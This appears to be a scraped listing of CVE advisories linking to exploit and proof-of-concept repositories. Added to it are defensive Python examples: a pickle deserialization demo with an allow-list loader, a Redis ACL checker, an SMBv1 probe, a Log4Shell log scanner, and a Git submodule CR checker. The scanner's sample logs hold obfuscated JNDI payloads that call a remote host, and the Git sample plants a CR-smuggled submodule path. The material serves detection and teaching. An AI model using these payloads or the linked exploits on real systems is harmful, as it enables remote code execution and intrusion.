CVE-2025-48384
Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. When reading a config value, Git strips any trailing carriage return and line feed (CRLF). When writing a config entry, values with a trailing CR are not quoted, causing the CR to be lost when the config is later read. When initializing a submodule, if the submodule path contains a trailing CR, the altered path is read resulting in the submodule being checked out to an incorrect location. If a symlink exists that points the altered path to the submodule hooks directory, and the submodule contains an executable post-checkout hook, the script may be unintentionally executed after checkout. This vulnerability is fixed in v2.43.7, v2.44.4, v2.45.4, v2.46.4, v2.47.3, v2.48.2, v2.49.1, and v2.50.1.
Github link:
https://github.com/testdjshan/CVE-2025-48384
CVE-2024-3568
Deserialization of untrusted data in Hugging Face Transformers: the TensorFlow model classes' checkpoint loading (TFPreTrainedModel.load_repo_checkpoint) unpickles checkpoint contents with pickle.load(), so a crafted checkpoint executes attacker-supplied code on the machine that loads it.
Github link:
https://github.com/rooobeam/Pickle-Deserialization-Exploit-in-Transformers
Repository description: This study analyzes Python pickle deserialization vulnerabilities, focusing on CVE-2024-3568 in Hugging Face Transformers' TFAutoModel. We reproduce the exploit to examine its root cause, a...
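The mechanism behind CVE-2024-3568 is generic pickle deserialization: the bytes carry instructions to call any importable callable, and pickle.load() obeys them. The following example is added here to show it; it is not code from the linked repository or from the Transformers project. The "checkpoint" bytes are constructed in the block, the invoked callable is os.getpid instead of a shell command so the demo stays harmless, and the allow-list in RestrictedUnpickler is an assumed, deliberately tiny set for illustration.

```python
import io
import os
import pickle
from collections import OrderedDict


class Payload:
    """An object whose pickle tells the unpickler to call a callable chosen by
    the attacker. os.getpid is used so the demo stays harmless; a real payload
    would name os.system or subprocess.Popen with attacker arguments."""

    def __reduce__(self):
        return (os.getpid, ())


def make_malicious_checkpoint():
    """Constructed 'checkpoint' bytes, i.e. what an attacker would publish."""
    return pickle.dumps(Payload())


def legit_checkpoint():
    """Constructed benign checkpoint: a mapping of tensor names to values."""
    return pickle.dumps(OrderedDict(weight=[1.0, 2.0]))


def current_pid():
    return os.getpid()


def load_unsafely(data):
    """Equivalent of calling pickle.load() on untrusted checkpoint bytes: the
    embedded callable runs during deserialization, before any return value."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Allow-list unpickler: find_class() is the only way a pickle obtains a
    global, so refusing everything off the list denies __reduce__ payloads
    any callable to invoke. The list below is an assumed example set."""

    ALLOWED = {("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def load_safely(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_rejected(data):
    """True when the restricted loader refuses the bytes."""
    try:
        load_safely(data)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    evil = make_malicious_checkpoint()
    print("unsafe load returned:", load_unsafely(evil))
    print("restricted load rejects payload:", is_rejected(evil))
    print("restricted load accepts benign:", load_safely(legit_checkpoint()))
```

An allow-list unpickler is a stopgap for formats you cannot change; for model weights the stronger fix is to stop shipping pickle at all and load a non-executable format such as safetensors.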
CVE-2025-5777
Insufficient input validation leading to memory overread when the NetScaler is configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) OR AAA virtual server
Github link:
https://github.com/bughuntar/CVE-2025-5777
Repository description: CVE-2025-5777 Citrix NetScaler memory leak exploit (CitrixBleed 2)
CVE-2025-32023
Redis is an open source, in-memory database that persists on disk. From 2.8 to before 8.0.3, 7.4.5, 7.2.10, and 6.2.19, an authenticated user may use a specially crafted string to trigger a stack/heap out of bounds write on hyperloglog operations, potentially leading to remote code execution. The bug likely affects all Redis versions with hyperloglog operations implemented. This vulnerability is fixed in 8.0.3, 7.4.5, 7.2.10, and 6.2.19. An additional workaround to mitigate the problem without patching the redis-server executable is to prevent users from executing hyperloglog operations. This can be done using ACL to restrict HLL commands.
Github link:
https://github.com/atomicjjbod/CVE-2025-32023
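The advisory's workaround is an ACL that removes the HyperLogLog commands from users who do not need them. Redis applies ACL rule tokens left to right, so a rule that grants a category after the -@hyperloglog token quietly re-enables part of what was removed. The example below is added here (not code from the repository or from Redis) and models that evaluation for a handful of commands so a rule can be checked before it is applied; the command-to-category table is a partial one constructed for the example, the rule strings are constructed, and the version check uses the fixed releases named in the advisory.

```python
import re

# Partial command-to-category table, constructed for this example from the
# categories Redis documents for these commands; not the full Redis table.
COMMAND_CATEGORIES = {
    "get": {"read", "string", "fast"},
    "set": {"write", "string", "slow"},
    "pfadd": {"write", "hyperloglog", "fast"},
    "pfcount": {"read", "hyperloglog", "slow"},
    "pfmerge": {"write", "hyperloglog", "slow"},
    "pfdebug": {"admin", "hyperloglog", "dangerous"},
    "pfselftest": {"admin", "hyperloglog", "dangerous"},
}
HLL_COMMANDS = {c for c, cats in COMMAND_CATEGORIES.items() if "hyperloglog" in cats}


def allowed_commands(rule):
    """Apply ACL SETUSER rule tokens left to right; later tokens override
    earlier ones, which is how a trailing +@write undoes -@hyperloglog."""
    allowed = set()
    for token in rule.split():
        t = token.lower()
        if t in ("allcommands", "+@all"):
            allowed = set(COMMAND_CATEGORIES)
        elif t in ("nocommands", "-@all"):
            allowed = set()
        elif t.startswith("+@"):
            allowed |= {c for c, cats in COMMAND_CATEGORIES.items() if t[2:] in cats}
        elif t.startswith("-@"):
            allowed -= {c for c, cats in COMMAND_CATEGORIES.items() if t[2:] in cats}
        elif t.startswith("+"):
            # "+cmd|sub" is treated as the whole command: over-approximates
            # exposure, which is the safe direction for this check
            allowed.add(t[1:].split("|", 1)[0])
        elif t.startswith("-"):
            allowed.discard(t[1:].split("|", 1)[0])
        # on/off, >password, ~keypattern, &channel: no effect on commands
    return allowed


def hll_exposure(rule):
    """HyperLogLog commands a user with this rule can still run."""
    return sorted(allowed_commands(rule) & HLL_COMMANDS)


FIXED = {(8, 0): (8, 0, 3), (7, 4): (7, 4, 5), (7, 2): (7, 2, 10), (6, 2): (6, 2, 19)}


def redis_is_fixed(version):
    """True if a redis_version string names a release with the fix. Minor lines
    the advisory lists no fixed release for (e.g. 7.0.x) report False; lines
    newer than 8.0 are assumed to carry the fix."""
    major, minor, patch = (int(x) for x in re.match(r"(\d+)\.(\d+)\.(\d+)", version).groups())
    if (major, minor) > (8, 0):
        return True
    fixed = FIXED.get((major, minor))
    return fixed is not None and (major, minor, patch) >= fixed


# Constructed ACL SETUSER rule strings; the password token is a placeholder
WEAK_RULE = "on >placeholder ~* +@all"
HARDENED_RULE = "on >placeholder ~* +@all -@hyperloglog"
MISTAKEN_RULE = "on >placeholder ~* +@all -@hyperloglog +@write"  # re-enables PFADD/PFMERGE

if __name__ == "__main__":
    for name, rule in [("weak", WEAK_RULE), ("hardened", HARDENED_RULE), ("mistaken", MISTAKEN_RULE)]:
        print(f"{name:9s} HLL commands still reachable: {hll_exposure(rule)}")
    print("7.4.4 fixed:", redis_is_fixed("7.4.4"), " 7.4.5 fixed:", redis_is_fixed("7.4.5"))
```

The same rule string is what goes after the user name in `ACL SETUSER app ...` or in a `user app ...` line of the ACL file; keep `-@hyperloglog` as the last category token, and verify with `ACL GETUSER app` on the live instance, since this model covers only the commands in its table.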
CVE-2017-0144
The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability." This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.
Github link:
https://github.com/AdityaBhatt3010/VAPT-Report-on-SMB-Exploitation-in-Windows-10-Finance-Endpoint
Repository description: This report outlines a structured VAPT engagement focusing on PCI DSS compliance, SMB service enumeration, and exploitation of CVE-2017-0144 (EternalBlue) on a Windows 10 machine within a finance-o...
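CVE-2017-0144 lives in the SMBv1 server, so the first enumeration step is finding out whether a host will still negotiate SMBv1 at all. The example below is added here and is not code from the linked report; it builds an SMB1 NEGOTIATE request, parses the response to see which dialect the server selected, and can be pointed at a live host. It only reports whether SMBv1 is negotiable, not whether MS17-010 is installed. The response bytes used for the offline run are constructed in the block, not captured from a real host.

```python
import socket
import struct

SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
# Dialect strings offered by a classic SMB1 client; a Windows SMBv1 server
# picks "NT LM 0.12" (index 5 in this list).
DIALECTS = [b"PC NETWORK PROGRAM 1.0", b"LANMAN1.0", b"Windows for Workgroups 3.1a",
            b"LM1.2X002", b"LANMAN2.1", b"NT LM 0.12"]


def smb1_header(command, flags=0x18, flags2=0xC853, pid=0xFEFF):
    # Magic(4) Command(1) Status(4) Flags(1) Flags2(2) PIDHigh(2) SecurityFeatures(8)
    # Reserved(2) TID(2) PIDLow(2) UID(2) MID(2) = 32 bytes, little-endian
    return SMB1_MAGIC + struct.pack("<BIBHH8sHHHHH", command, 0, flags, flags2,
                                    0, bytes(8), 0, 0, pid, 0, 0)


def build_negotiate_request(dialects=DIALECTS):
    """SMB1 NEGOTIATE: WordCount=0, then ByteCount and the dialect list,
    each entry being 0x02 + name + NUL, wrapped in a NetBIOS session header."""
    data = b"".join(b"\x02" + d + b"\x00" for d in dialects)
    smb = smb1_header(SMB_COM_NEGOTIATE) + b"\x00" + struct.pack("<H", len(data)) + data
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


def parse_negotiate_response(raw, dialects=DIALECTS):
    """Return the dialect name the server selected, or None if no SMBv1
    dialect was negotiated (error status, DialectIndex 0xFFFF, or garbage)."""
    if len(raw) < 4 + 32 + 3:
        return None
    smb = raw[4:]  # strip the NetBIOS session header
    if smb[:4] != SMB1_MAGIC or smb[4] != SMB_COM_NEGOTIATE:
        return None
    if struct.unpack_from("<I", smb, 5)[0] != 0:  # NT status must be success
        return None
    word_count = smb[32]
    if word_count == 0:
        return None
    dialect_index = struct.unpack_from("<H", smb, 33)[0]
    if dialect_index == 0xFFFF or dialect_index >= len(dialects):
        return None
    return dialects[dialect_index].decode()


def probe_smb1(host, port=445, timeout=3.0):
    """Live check. A server with SMBv1 disabled usually closes the connection
    without answering; that and any socket error are reported as None."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_negotiate_request())
            return parse_negotiate_response(s.recv(4096))
    except OSError:
        return None


def sample_response(dialect_index, word_count=17):
    """Constructed server reply for offline testing (not a real capture):
    WordCount words of parameters, DialectIndex first, then ByteCount=0."""
    params = struct.pack("<H", dialect_index) + bytes(2 * word_count - 2)
    smb = (smb1_header(SMB_COM_NEGOTIATE, flags=0x98) + bytes([word_count])
           + params + struct.pack("<H", 0))
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


if __name__ == "__main__":
    print("accepting server selects:", parse_negotiate_response(sample_response(5)))
    print("rejecting server selects:", parse_negotiate_response(sample_response(0xFFFF, word_count=1)))
```

A result of "NT LM 0.12" means the host still speaks SMBv1 and belongs on the list for patch verification and for disabling the protocol; None means SMBv1 was not negotiated, which is the expected state on a hardened Windows 10 host.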
CVE-2021-44228
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Github link:
https://github.com/fabioeletto/hka-seminar-log4shell
Repository description: Practical demonstration of the Log4Shell vulnerability (CVE-2021-44228)
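Because the trigger is a lookup string inside attacker-controlled log text, detection has to see through the nested lookups attackers use to hide the word "jndi" (${lower:j}, ${::-j}, ${env:NOPE:-j}). The example below is added here and is not code from the linked seminar repository; it collapses those obfuscation lookups the way Log4j's substitution would and then matches the normalized text, so one rule catches the plain and the obfuscated forms. The access-log lines it runs over are constructed (203.0.113.7 is a documentation address), and the set of resolved lookup types is the common obfuscation subset, not Log4j's full lookup list.

```python
import re

LOOKUP = re.compile(r"\$\{([^${}]*)\}")  # innermost ${...} with nothing nested inside
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nis|nds)\s*:", re.I)


def resolve_obfuscation(content):
    """Resolve the lookups attackers nest only to hide the string 'jndi'.
    Returns None for anything else (including jndi itself) so it is kept."""
    low = content.lower()
    if low.startswith("jndi:"):
        return None
    if ":-" in content:               # ${x:-default}, ${env:NOPE:-j}, ${::-j}
        return content.split(":-", 1)[1]
    if low.startswith("lower:"):
        return content[6:].lower()
    if low.startswith("upper:"):
        return content[6:].upper()
    return None


def normalize(text, max_rounds=32):
    """Repeatedly collapse innermost obfuscation lookups until nothing changes,
    so ${${lower:j}ndi:...} becomes ${jndi:...}."""
    def sub(m):
        r = resolve_obfuscation(m.group(1))
        return m.group(0) if r is None else r

    for _ in range(max_rounds):
        new = LOOKUP.sub(sub, text)
        if new == text:
            break
        text = new
    return text


def scan(lines):
    """Return (line_number, normalized JNDI prefix) for every line carrying a
    JNDI lookup after de-obfuscation."""
    hits = []
    for n, line in enumerate(lines, start=1):
        m = JNDI.search(normalize(line))
        if m:
            hits.append((n, m.group(0)))
    return hits


# Constructed access-log lines, not from a real server
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.5 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://203.0.113.7/x}"',
    '10.0.0.5 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.7/y}"',
    '10.0.0.5 - - [10/Dec/2021:14:02:14 +0000] "GET / HTTP/1.1" 200 "-" "${${env:NaN:-j}ndi:dns://203.0.113.7/z}"',
    '10.0.0.6 - - [10/Dec/2021:14:02:15 +0000] "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:14:02:16 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for n, prefix in scan(SAMPLE_LOG):
        print(f"line {n}: {prefix}  <- {normalize(SAMPLE_LOG[n - 1])[-60:]}")
```

Run it over the raw request logs of anything that fed user input into a Log4j 2 logger (User-Agent, X-Forwarded-For, form fields, usernames); the benign ${date:yyyy} lookup on the last line is intentionally not flagged, since only the jndi family reaches out to a remote server.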
CVE-2025-5777
Insufficient input validation leading to memory overread when the NetScaler is configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) OR AAA virtual server
Github link:
https://github.com/0xgh057r3c0n/CVE-2025-5777
Repository description: Citrix NetScaler memory leak PoC
CVE-2022-36934
An integer overflow in WhatsApp could result in remote code execution in an established video call.
Github link:
https://github.com/Teexo/mailenable-cve-2022-36934
Repository description: Metasploit module for MailEnable CVE-2022-36934 authentication bypass RCE
Note: the advisory text above assigns CVE-2022-36934 to a WhatsApp video-call integer overflow, while the repository labels itself as a MailEnable authentication-bypass module; the identifier and the module do not match, so verify which issue the module actually targets before citing the CVE.
CVE-2024-32113
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.13.
Users are recommended to upgrade to version 18.12.13, which fixes the issue.
Github link:
https://github.com/guinea-offensive-security/Ofbiz-RCE
Repository description: CVE-2024-32113 & CVE-2024-38856
CVE-2014-6287
The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aka HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.
Github link:
https://github.com/rahisec/rejetto-http-file-server-2.3.x-RCE-exploit-CVE-2014-6287
Repository description: Detailed explanation and working PoC for Rejetto HTTP File Server (HFS) 2.3.x remote command execution
CVE-2025-5777
Insufficient input validation leading to memory overread when the NetScaler is configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) OR AAA virtual server
Github link:
https://github.com/Jishanluhar/CVE-2025-5777
Repository description: Explore the CVE-2025-5777 vulnerability in Citrix NetScaler. This script highlights a memory leak issue for educational purposes.
CVE-2025-48384
Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. When reading a config value, Git strips any trailing carriage return and line feed (CRLF). When writing a config entry, values with a trailing CR are not quoted, causing the CR to be lost when the config is later read. When initializing a submodule, if the submodule path contains a trailing CR, the altered path is read resulting in the submodule being checked out to an incorrect location. If a symlink exists that points the altered path to the submodule hooks directory, and the submodule contains an executable post-checkout hook, the script may be unintentionally executed after checkout. This vulnerability is fixed in v2.43.7, v2.44.4, v2.45.4, v2.46.4, v2.47.3, v2.48.2, v2.49.1, and v2.50.1.
Github link:
https://github.com/vinieger/vinieger-CVE-2025-48384-Dockerfile
Repository description: PoC Dockerfile image for CVE-2025-48384
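Both CVE-2025-48384 entries on this page describe the same read/write asymmetry: the reader strips a trailing CR, the pre-fix writer never quotes one, so a submodule path written as "sub" plus CR is read back as "sub". The example below is added here to make that round trip visible and to give two checks a practitioner wants: whether the local git carries the fix, and whether a .gitmodules file contains paths with control characters. It is a simplified model written for this page, not Git's own config code or anything from the two linked repositories; the "\tkey = value\n" line layout, the escape handling and the sample .gitmodules are assumptions constructed for the example, and the fixed-release table is taken from the advisory text above.

```python
import re

# Fixed releases named in the advisory, keyed by minor line
FIXED_RELEASES = {
    (2, 43): (2, 43, 7), (2, 44): (2, 44, 4), (2, 45): (2, 45, 4), (2, 46): (2, 46, 4),
    (2, 47): (2, 47, 3), (2, 48): (2, 48, 2), (2, 49): (2, 49, 1), (2, 50): (2, 50, 1),
}


def write_value_unpatched(key, value):
    """Pre-fix writer model: a trailing CR is emitted bare, unquoted."""
    return f"\t{key} = {value}\n"


def write_value_patched(key, value):
    """Post-fix writer model: quote any value with leading/trailing whitespace
    or a control character, so the reader meets the CR inside the quotes
    instead of at the end of the line. Escape handling is simplified."""
    if value != value.strip() or any(ord(c) < 0x20 for c in value):
        escaped = (value.replace("\\", "\\\\").replace('"', '\\"')
                        .replace("\n", "\\n").replace("\t", "\\t"))
        return f'\t{key} = "{escaped}"\n'
    return f"\t{key} = {value}\n"


def read_value(line):
    """Reader model: trailing CR/LF are stripped from the line before the
    value is parsed (the behaviour the advisory describes); double-quoted
    values keep their contents."""
    line = line.rstrip("\r\n")
    _, _, raw = line.partition("=")
    raw = raw.strip(" \t")
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        body = raw[1:-1]
        return (body.replace("\\n", "\n").replace("\\t", "\t")
                    .replace('\\"', '"').replace("\\\\", "\\"))
    return raw


def round_trip(writer, key, value):
    """Value as Git would read it back after the given writer stored it."""
    return read_value(writer(key, value))


def git_is_fixed(version_output):
    """True if a `git --version` string names a release carrying the fix.
    Minor lines before 2.43 have no fixed release in the advisory (False);
    lines newer than 2.50 are assumed to carry the fix (True)."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", version_output)
    if not m:
        raise ValueError(f"cannot parse a version from {version_output!r}")
    major, minor, patch = (int(x) for x in m.groups())
    if (major, minor) > (2, 50):
        return True
    fixed = FIXED_RELEASES.get((major, minor))
    return fixed is not None and (major, minor, patch) >= fixed


PATH_LINE = re.compile(r"^\s*path\s*=\s*(.*)$")


def suspicious_submodule_paths(gitmodules_text):
    """Scan .gitmodules text for path values containing control characters
    (a trailing CR is the case this CVE exploits). Returns (line, raw value)."""
    hits = []
    for lineno, line in enumerate(gitmodules_text.split("\n"), start=1):
        m = PATH_LINE.match(line)
        if m and any(ord(c) < 0x20 or c == "\x7f" for c in m.group(1)):
            hits.append((lineno, m.group(1)))
    return hits


# Constructed sample .gitmodules; the second entry smuggles a CR in its path
SAMPLE_GITMODULES = (
    '[submodule "lib"]\n\tpath = lib\n\turl = https://example.invalid/lib.git\n'
    '[submodule "evil"]\n\tpath = "evil\r"\n\turl = https://example.invalid/evil.git\n'
)

if __name__ == "__main__":
    print("unpatched round trip:", repr(round_trip(write_value_unpatched, "submodule.evil.path", "evil\r")))
    print("patched round trip:  ", repr(round_trip(write_value_patched, "submodule.evil.path", "evil\r")))
    print("suspicious paths:", suspicious_submodule_paths(SAMPLE_GITMODULES))
    print("2.50.1 fixed:", git_is_fixed("git version 2.50.1"))
```

Feed git_is_fixed() the output of `git --version` on build agents and developer machines, and run suspicious_submodule_paths() over .gitmodules of repositories you clone with --recurse-submodules; a path that trips it has no legitimate reason to contain a control character.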
CVE-2024-4577
In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.
Github link:
https://github.com/ZeroMemoryEx/PHP-CGI-INTERNAL-RCE
Repository description: Delivering PHP RCE (CVE-2024-4577) to local network servers
CVE-2007-2447
The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share management.
Github link:
https://github.com/MrRoma577/exploit_cve-2007-2447_again
Repository description: just remember how a small mistake in sanitizing the username could give you root access to the full machine